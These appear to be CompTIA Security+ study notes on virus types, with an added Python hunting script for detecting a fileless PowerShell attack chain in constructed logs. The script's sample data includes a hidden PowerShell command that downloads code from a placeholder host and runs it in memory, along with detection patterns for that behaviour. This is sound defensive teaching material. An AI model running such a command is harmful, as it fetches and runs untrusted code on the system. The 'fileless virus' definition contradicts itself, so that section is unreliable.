CompTIA Security+: 1.2 Analyze types of attack.
Program Virus (file virus)
- Infects executables
- Program viruses seek out executables or application files to infect.
For example,
- if a virus were able to install itself into your Microsoft Word program, every time you opened up Word you'd be loading that virus again and again.
- And that's why a program virus targets programs.
• A virus is malicious code or a program written to alter the way a computer operates and designed to spread from one computer to another.
• A virus operates by inserting or attaching itself to a legitimate program or document that supports macros in order to execute its code.
Boot Sector Virus
Boot sector virus:
• Placed in the first hard drive sector
- A boot sector virus is one that's stored in the first sector of a hard drive and is loaded into memory whenever the computer boots up.
- These are actually very difficult to detect because they're installed before the operating system boots up.
• These viruses were once common back when computers were booted from floppy disks.
• Today, these viruses are distributed on physical media such as external hard drives and USBs, or through email attachments.
• If the computer is infected with a boot sector virus, the virus automatically loads into memory, enabling control of your computer.
• When activated, it can infect the system’s master boot record to damage the system.
Macro Virus
Macro virus:
• Placed into documents
- Macros are a form of code that allows a virus to be embedded inside another document.
- And when that document is opened by the user, that virus then is executed.
- The most common examples of macros are ones that are found inside Word documents or Excel spreadsheets, or PowerPoint presentations.
- By default, macros aren't malicious.
• This type of virus is commonly found in programs such as Microsoft Word or Excel. These viruses are usually stored as part of a document and can spread when the files are transmitted to other computers, often through email attachments.
• A macro virus is written in a macro language used by other software programs, especially Microsoft Excel and Microsoft Word.
• It is transmitted through a phishing email message containing a malicious attachment.
• As users share the infected documents with others, often by forwarding the email, the virus spreads and infects additional devices.
Fileless Virus
Fileless virus:
• A virus that attaches itself to an executable program.
• It is also called a parasitic virus which typically infects files with .exe or .com extensions.
• Some file infectors can overwrite host files and others can damage your hard drive’s formatting.
• A stealth attack
– Does a good job of avoiding anti-virus detection
• Operates in memory
– But never installed in a file or application
Example
• The user clicks on a malicious website link.
• Website exploits a Flash/Java/Windows vulnerability.
• Launches PowerShell and downloads payload.
• Runs PowerShell scripts and executes in memory.
• Adds an auto-start to the registry.
Anti-virus software that is appropriately updated with the latest signatures can help stop viruses from infecting the systems.
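The steps in the example above leave traces a defender can correlate. The following is an added example, not part of the original notes: a small hunt over constructed events, loosely modelled on Sysmon process-creation (ID 1) and registry-value-set (ID 13) records. Host names, field names, the stage labels and the URL are assumptions made for illustration.

```python
import re

# Constructed sample events (not real logs). Fields are simplified from
# Sysmon Event ID 1 (process creation) and 13 (registry value set).
EVENTS = [
    {"id": 1, "host": "ws01", "parent": "chrome.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"id": 13, "host": "ws01", "image": "powershell.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"id": 1, "host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"id": 13, "host": "ws03", "image": "msiexec.exe",
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray"},
]

CLIENT_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "java.exe", "winword.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
IN_MEMORY = re.compile(r"downloadstring|downloaddata|invoke-expression|\biex\b|-enc", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)

def score_event(ev):
    """Return the set of fileless-chain stages that one event matches."""
    stages = set()
    image = ev.get("image", "").lower()
    if ev["id"] == 1 and image in SCRIPT_HOSTS:
        # Browser, Java or Office process launching PowerShell
        if ev.get("parent", "").lower() in CLIENT_APPS:
            stages.add("client-app-spawned-powershell")
        # Command line that fetches content and evaluates it without a script file
        if IN_MEMORY.search(ev.get("cmd", "")):
            stages.add("download-and-run-in-memory")
    # PowerShell writing an auto-start entry under a Run/RunOnce key
    if ev["id"] == 13 and image in SCRIPT_HOSTS and RUN_KEY.search(ev.get("target", "")):
        stages.add("registry-autostart")
    return stages

def hunt(events, threshold=2):
    """Collect stages per host; report hosts showing at least `threshold` distinct stages."""
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(score_event(ev))
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= threshold}

if __name__ == "__main__":
    for host, stages in hunt(EVENTS).items():
        print(host, "->", ", ".join(stages))
```

Requiring two or more stages on the same host keeps an administrator's scheduled script (ws02) or an installer's Run key (ws03) from raising an alert on its own.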
Script Virus
Script virus:
• A very sneaky virus that targets popular websites.
• This sneaky virus disguises itself in the coding of links, ads, images, videos, and site code.
• It can infect systems when users download malicious files or visit malicious websites.
• What this virus does is overwrite code on a website and insert links that can install malicious software on your device.
• Web scripting viruses can steal your cookies and use the information to post on your behalf on the infected website.
– Ransomware
– Trojans
– Worms
– Potentially unwanted programs (PUPs)
– Fileless virus
– Command and control
– Bots
– Crypto malware
– Logic bombs
– Spyware
– Keyloggers
– Remote access Trojan (RAT)
– Rootkit
– Backdoor
CompTIA Security+ SY0-601